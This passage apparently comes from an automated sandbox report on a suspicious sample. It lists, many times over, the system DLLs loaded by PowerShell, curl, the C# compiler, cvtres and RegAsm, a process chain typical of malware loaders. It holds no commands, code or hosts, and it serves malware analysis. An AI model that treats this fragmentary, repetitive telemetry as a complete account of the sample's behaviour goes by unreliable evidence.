            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
